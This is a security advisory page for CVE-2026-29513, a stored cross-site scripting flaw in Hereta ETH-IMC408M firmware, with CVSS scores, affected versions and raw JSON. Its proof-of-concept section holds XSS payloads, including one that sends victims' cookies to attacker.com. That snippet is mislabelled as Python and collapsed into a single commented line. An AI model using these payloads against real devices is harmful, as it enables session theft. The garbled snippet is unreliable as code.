Security Vulnerability Report
中文
CVE-2026-29513 CVSS 5.4 MEDIUM

CVE-2026-29513

Published: 2026-03-16 18:16:08
Last Modified: 2026-04-10 17:44:34
Source: [email protected]

Description

Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Location field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Hereta ETH-IMC408M firmware <= 1.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-29513 PoC - Stored XSS in Hereta ETH-IMC408M Device Location Field // Target: Hereta ETH-IMC408M firmware <= 1.0.15 // Attack Vector: Inject JavaScript via Device Location field in System Status interface // Step 1: Authenticate with low-privilege account // POST /login HTTP/1.1 // username=attacker&password=password123 // Step 2: Inject XSS payload in Device Location field // POST /api/device/location HTTP/1.1 // {"location": "<script>alert(document.cookie)</script>"} // Alternative payload for session hijacking: const xssPayload = ` <img src=x onerror=" fetch('https://attacker.com/steal?cookie='+document.cookie) "> `; // Step 3: Wait for victim to view System Status page // When victim visits the page, XSS payload executes in their browser context // Metasploit module reference: // https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2026-29513

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29513", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:08.190", "lastModified": "2026-04-10T17:44:34.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Location field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation."}, {"lang": "es", "value": "Hereta ETH-IMC408M firmware versión 1.0.15 y anteriores contienen una vulnerabilidad de cross-site scripting almacenado que permite a atacantes autenticados inyectar JavaScript arbitrario manipulando el campo Device Location. Los atacantes pueden inyectar scripts maliciosos a través de la interfaz System Status que se ejecutan en los navegadores de los usuarios que ven la página de estado sin saneamiento de entrada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.15", "matchCriteriaId": "9E114378-9A8F-4EC3-A7B3-89DF7D6BBEC0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D3C670E1-A5ED-4FC7-8150-0B62411371F9"}]}]}], "references": [{"url": "https://web.archive.org/web/20250820105319/http://hereta.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/hereta-eth-imc408m-stored-xss-via-device-location", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.